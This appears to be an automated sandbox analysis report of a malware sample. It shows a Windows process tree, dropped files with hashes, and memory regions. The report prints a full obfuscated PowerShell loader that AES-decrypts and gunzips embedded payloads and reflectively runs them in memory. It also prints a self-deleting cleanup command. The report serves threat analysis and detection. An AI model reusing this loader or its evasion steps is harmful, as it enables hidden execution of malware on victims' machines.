                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{70d7aada-2db4-4463-b836-3b4b0f4117a4}
                                                    5⤵
                                                      PID:2368
                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{63f17078-1047-4047-bc10-c696993f2bdc}
                                                      5⤵
                                                        PID:4888
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                1⤵
                                                  PID:1032
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                  1⤵
                                                    PID:1048
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1060
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                      1⤵
                                                        PID:1192
                                                        • C:\Windows\system32\sihost.exe
                                                          sihost.exe
                                                          2⤵
                                                            PID:3076
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                          1⤵
                                                          • Drops file in System32 directory
                                                          PID:1236
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                          1⤵
                                                            PID:1344
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                            1⤵
                                                              PID:1360
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                              1⤵
                                                                PID:1396
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                1⤵
                                                                  PID:1476
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                  1⤵
                                                                    PID:1524
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                    1⤵
                                                                      PID:1540
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                      1⤵
                                                                        PID:1596
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                        1⤵
                                                                          PID:1652
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:1740
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                            1⤵
                                                                              PID:1776
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                              1⤵
                                                                                PID:1912
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:1928
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                  1⤵
                                                                                    PID:1968
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                    1⤵
                                                                                      PID:2004
                                                                                    • C:\Windows\System32\spoolsv.exe
                                                                                      C:\Windows\System32\spoolsv.exe
                                                                                      1⤵
                                                                                        PID:1696
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                        1⤵
                                                                                          PID:2080
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                          1⤵
                                                                                            PID:2204
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                            1⤵
                                                                                              PID:2220
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                              1⤵
                                                                                              • Checks processor information in registry
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2312
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                              1⤵
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:2360
                                                                                            • C:\Windows\sysmon.exe
                                                                                              C:\Windows\sysmon.exe
                                                                                              1⤵
                                                                                                PID:2416
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                1⤵
                                                                                                  PID:2432
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                  1⤵
                                                                                                    PID:2444
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                    1⤵
                                                                                                      PID:2452
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                                      1⤵
                                                                                                        PID:2708
                                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2872
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                          1⤵
                                                                                                            PID:3084
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                            1⤵
                                                                                                              PID:3196
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                              1⤵
                                                                                                                PID:3324
                                                                                                              • C:\Windows\Explorer.EXE
                                                                                                                C:\Windows\Explorer.EXE
                                                                                                                1⤵
                                                                                                                • Suspicious use of UnmapMainImage
                                                                                                                PID:3400
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat"
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1964
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    3⤵
                                                                                                                      PID:1204
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
                                                                                                                      "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                      3⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3004
                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{6ab65313-21cf-4103-85e9-a6640bcb329f}
                                                                                                                        4⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5104
                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{133a74d9-dcf4-492b-aa4e-0b927164b6de}
                                                                                                                        4⤵
                                                                                                                          PID:2040
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & exit
                                                                                                                          4⤵
                                                                                                                            PID:5368
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              5⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:4544
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              PING localhost -n 8
                                                                                                                              5⤵
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:5660
                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                              taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"
                                                                                                                              5⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:4916
                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                              ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"
                                                                                                                              5⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:3596
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                      1⤵
                                                                                                                        PID:3532
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                          PID:3724
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                                          PID:3876
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:3576
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:2192
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                              1⤵
                                                                                                                                PID:2792
                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                1⤵
                                                                                                                                  PID:4740
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                  1⤵
                                                                                                                                    PID:3912
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                    1⤵
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:1936
                                                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:1452
                                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:4876
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                      1⤵
                                                                                                                                        PID:1552
                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                        1⤵
                                                                                                                                          PID:3936
                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4332
                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:2128
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                            1⤵
                                                                                                                                              PID:4848
                                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                              1⤵
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:4104
                                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:1164
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                1⤵
                                                                                                                                                  PID:3964
                                                                                                                                                • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                  C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  PID:2660
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                  PID:5876
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5608 -ip 5608
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4496
                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 580 -p 3852 -ip 3852
                                                                                                                                                      2⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      PID:1276
                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:6104
                                                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                      1⤵
                                                                                                                                                        PID:6032
                                                                                                                                                      • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2672
                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1324

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER13D1.tmp.csv
                                                                                                                                                            Filesize

                                                                                                                                                            41KB

                                                                                                                                                            MD5

                                                                                                                                                            16a2af4a85ee30386620d36c2017b797

                                                                                                                                                            SHA1

                                                                                                                                                            e1d2e9003ad3ac759429991b6cfc2093b0434020

                                                                                                                                                            SHA256

                                                                                                                                                            8c3f90d187ed136ddad98dc9c9502d0492587b4d92cd6579c424a174efc35b7d

                                                                                                                                                            SHA512

                                                                                                                                                            ef95d4a1db3f148772155cc50455e0e95f1e12e3f70fdfe5cdd058e87df0a77a5fbc1ca15675eed9e39f6367d23e68e1c3caf2264273df314b184e37b8416847

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER13F1.tmp.txt
                                                                                                                                                            Filesize

                                                                                                                                                            13KB

                                                                                                                                                            MD5

                                                                                                                                                            896ea2bdb8a9f5ccba451640f9c3df33

                                                                                                                                                            SHA1

                                                                                                                                                            3254314a95995fb6b36f6954aa026dd91510d98d

                                                                                                                                                            SHA256

                                                                                                                                                            b6ecdd960f18e62fed63d9fc1ea80cc89b8aeb77c0b3e381334da78e0f60aed7

                                                                                                                                                            SHA512

                                                                                                                                                            3973d75df8e6f0e298c5e215f10c9e93a415fbdacf44be3c4b4b4470237ff22c6e9ec8b2f638ff4865bf9f3b5c38c5ca2b24b82d871675d148f9c5fa56a71e7d

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER1838.tmp.csv
                                                                                                                                                            Filesize

                                                                                                                                                            41KB

                                                                                                                                                            MD5

                                                                                                                                                            53d0a361d856f60667fe552f3b32ceaa

                                                                                                                                                            SHA1

                                                                                                                                                            e895e0d806ae400c11c9e97f51fffc40ca54e5cf

                                                                                                                                                            SHA256

                                                                                                                                                            39efd95243e12392e9b22142ace742fa5c5d686ab0f58a5231242814ada38744

                                                                                                                                                            SHA512

                                                                                                                                                            e6944d1075fe31554d9380fdad8d704cb07f864a27939eab0d8eb8614d35ddd1980a29d20da60e16a4025db17a0c959c7196964550e90251848827dc84fa9474

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER1868.tmp.txt
                                                                                                                                                            Filesize

                                                                                                                                                            13KB

                                                                                                                                                            MD5

                                                                                                                                                            de2db7c82dcb340c460f39094f1dbf33

                                                                                                                                                            SHA1

                                                                                                                                                            7c023112c22f07704a14eba704ed88a3ff2922bf

                                                                                                                                                            SHA256

                                                                                                                                                            bf449934ff848667751bf6f8c2a5c27d9a6e39d84ff2532ef8370074d7b8a304

                                                                                                                                                            SHA512

                                                                                                                                                            6e43b67bf78ca595e66d3bde22a5a25caf9799a5f3b3d8bdbbb82cd243510da7c77b36c3c7001a446f543e895970bf4b986553f60a3a1a807b2856eedbd743b5

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
                                                                                                                                                            Filesize

                                                                                                                                                            442KB

                                                                                                                                                            MD5

                                                                                                                                                            04029e121a0cfa5991749937dd22a1d9

                                                                                                                                                            SHA1

                                                                                                                                                            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                                            SHA256

                                                                                                                                                            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                                            SHA512

                                                                                                                                                            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eq5p10tv.rzg.ps1
                                                                                                                                                            Filesize

                                                                                                                                                            60B

                                                                                                                                                            MD5

                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                            SHA1

                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                            SHA256

                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                            SHA512

                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                          • C:\Windows\$sxr-cmd.exe
                                                                                                                                                            Filesize

                                                                                                                                                            283KB

                                                                                                                                                            MD5

                                                                                                                                                            8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                                                            SHA1

                                                                                                                                                            f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                                                            SHA256

                                                                                                                                                            b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                                                            SHA512

                                                                                                                                                            99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                                                          • C:\Windows\$sxr-mshta.exe
                                                                                                                                                            Filesize

                                                                                                                                                            14KB

                                                                                                                                                            MD5

                                                                                                                                                            0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                                                            SHA1

                                                                                                                                                            51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                                                            SHA256

                                                                                                                                                            dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                                                            SHA512

                                                                                                                                                            d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                            SHA1

                                                                                                                                                            98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                            SHA256

                                                                                                                                                            ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                            SHA512

                                                                                                                                                            c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            f313c5b4f95605026428425586317353

                                                                                                                                                            SHA1

                                                                                                                                                            06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                            SHA256

                                                                                                                                                            129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                            SHA512

                                                                                                                                                            b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                            SHA1

                                                                                                                                                            a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                            SHA256

                                                                                                                                                            98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                            SHA512

                                                                                                                                                            1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                            SHA1

                                                                                                                                                            63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                            SHA256

                                                                                                                                                            727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                            SHA512

                                                                                                                                                            f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                            SHA1

                                                                                                                                                            5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                            SHA256

                                                                                                                                                            55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                            SHA512

                                                                                                                                                            5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                            SHA1

                                                                                                                                                            9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                            SHA256

                                                                                                                                                            a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                            SHA512

                                                                                                                                                            c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                          • memory/584-116-0x00007FFB05830000-0x00007FFB05840000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/584-101-0x000001F0060D0000-0x000001F0060F2000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/584-105-0x000001F0064D0000-0x000001F0064F7000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            156KB

                                                                                                                                                          • memory/676-128-0x00007FFB05830000-0x00007FFB05840000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/676-109-0x0000029F2B3B0000-0x0000029F2B3D7000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            156KB

                                                                                                                                                          • memory/964-83-0x000001DA1D4C0000-0x000001DA1D4FC000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            240KB

                                                                                                                                                          • memory/964-72-0x000001DA1D580000-0x000001DA1D632000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            712KB

